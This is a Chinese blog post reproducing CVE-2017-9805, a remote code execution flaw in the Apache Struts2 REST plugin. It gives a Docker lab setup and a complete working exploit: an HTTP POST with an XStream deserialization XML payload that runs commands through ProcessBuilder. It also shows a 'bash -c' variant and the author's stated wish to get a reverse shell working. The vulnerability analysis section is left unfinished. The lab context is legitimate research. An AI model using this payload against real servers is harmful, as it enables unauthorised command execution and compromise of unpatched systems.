作者:手机用户2502922177 | 来源:互联网 | 2023-09-03 17:35
前天发布的新漏洞,以前Struts的漏洞也是经常出,今年三月份就有一次。但这类的洞一直没有跟进,今天也是想着把它给复现一下,同时搭个环境分析一下漏洞形成的原因。
0x01 漏洞简介
漏洞背景 2017年9月5日,Apache官方发布了一则公告,该公告称Apache Struts2的REST插件存在远程代码执行的高危漏洞,CVE编号为CVE-2017-9805。 Struts2 REST插件的XStream组件存在反序列化漏洞,使用带有 XStream实例的 XStreamHandler进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
0x02 环境搭建
env | 版本 |
---|
docker | 16.04 |
jdk | 1.8.0_144 |
struts源码 | 2.5.12 |
tomcat | 8.0.46 |
直接从官网下载相对应的源码
0x1 dockerfile
FROM ubuntu:16.04 MAINTAINER 4t10n <act01n&#64;163.com>
ENV DEBIAN_FRONTEND noninteractive RUN sed -i &#39;s/archive.ubuntu.com/mirrors.ustc.edu.cn/g&#39; /etc/apt/sources.listRUN apt-get update -y \&& apt-get install unzip\&& apt-get install net-toolsWORKDIR /tmp
COPY ./apache-tomcat-8.0.46.tar.gz /tmp/
COPY ./jdk.tar.gz /tmp/
COPY ./struts.zip /tmp/
COPY ./cmd.sh /tmp/
RUN chmod a&#43;x cmd.sh EXPOSE 8080CMD ["/bin/bash","/tmp/cmd.sh"]
cmd.sh
tar -xz -f jdk.tar.gz -C /usr/local/
tar -xz -f apache-tomcat-8.0.46.tar.gz -C /usr/local/
unzip struts.zip -d /usr/local/apache-tomcat-8.0.46/webappsmv /usr/local/apache-tomcat-8.0.46/webapps/struts-2.5.12/apps/struts2-rest-showcase.war ./../../
# setup jdk
echo &#39;&#39;&#39;
JAVA_HOME&#61;/usr/local/jdk1.8.0_144
JAVA_BIN&#61;/usr/local/jdk1.8.0_144/bin
PATH&#61;$PATH:$JAVA_BIN
CLASSPATH&#61;$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar
export JAVA_HOME JAVA_BIN PATH CLASSPATH
&#39;&#39;&#39;>>/etc/profile
source /etc/profile
/usr/local/apache-tomcat-8.0.46/bin/startup.sh/bin/bash
相关源码在Github上
0x2 攻击代码
这里只是生成一个文件4ct10n
POST /struts2-rest-showcase/orders/3 HTTP/1.1
Host: 192.168.43.165:8989
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: en-US,en;q&#61;0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.165:8989/struts2-rest-showcase/orders/3/edit
COOKIE: JSESSIONID&#61;31A64A6CF6021DA63449D6DDEF10202F
Connection: close
Content-Type: application/xml
Content-Length: 1656<map>
<entry>
<jdk.nashorn.internal.objects.NativeString> <flags>0flags> <value class&#61;"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class&#61;"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class&#61;"javax.crypto.CipherInputStream"> <cipher class&#61;"javax.crypto.NullCipher"> <initialized>falseinitialized> <opmode>0opmode> <serviceIterator class&#61;"javax.imageio.spi.FilterIterator"> <iter class&#61;"javax.imageio.spi.FilterIterator"> <iter class&#61;"java.util.Collections$EmptyIterator"/> <next class&#61;"java.lang.ProcessBuilder"> <command><string>/usr/bin/touchstring><string>/home/4ct10nstring> command> <redirectErrorStream>falseredirectErrorStream> next> iter> <filter class&#61;"javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilderclass> <name>startname> <parameter-types/> method> <name>fooname> filter> <next class&#61;"string">foonext> serviceIterator> <lock/> cipher> <input class&#61;"java.lang.ProcessBuilder$NullInputStream"/> <ibuffer>ibuffer> <done>falsedone> <ostart>0ostart> <ofinish>0ofinish> <closed>falseclosed> is> <consumed>falseconsumed> dataSource> <transferFlavors/> dataHandler> <dataLen>0dataLen> value> jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference&#61;"../jdk.nashorn.internal.objects.NativeString"/> entry> <entry> <jdk.nashorn.internal.objects.NativeString reference&#61;"../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference&#61;"../../entry/jdk.nashorn.internal.objects.NativeString"/>
entry>
map>
0x3 攻击后续
其实在正真测试的时候已近发现了一些指令受了限制&#xff0c;但是一开始并没有进行研究&#xff0c;今天瞅了一眼freebuf文章&#xff0c;看是已经能够执行任何指令&#xff0c;这里是连接
我在这也是实验了一发&#xff0c;试了一下文中说的其他指令&#xff0c;但唯独shell反弹没有成功
文中主要说的利用方法是利用bash -c指令
具体格式如下
<command>
<string>bashstring>
<string>-cstring>
<string>echo asd >/tmp/4ct10nstring>
command>
怎么反弹shell ……. &#xff0c;在线等
0x02 漏洞分析
未完待续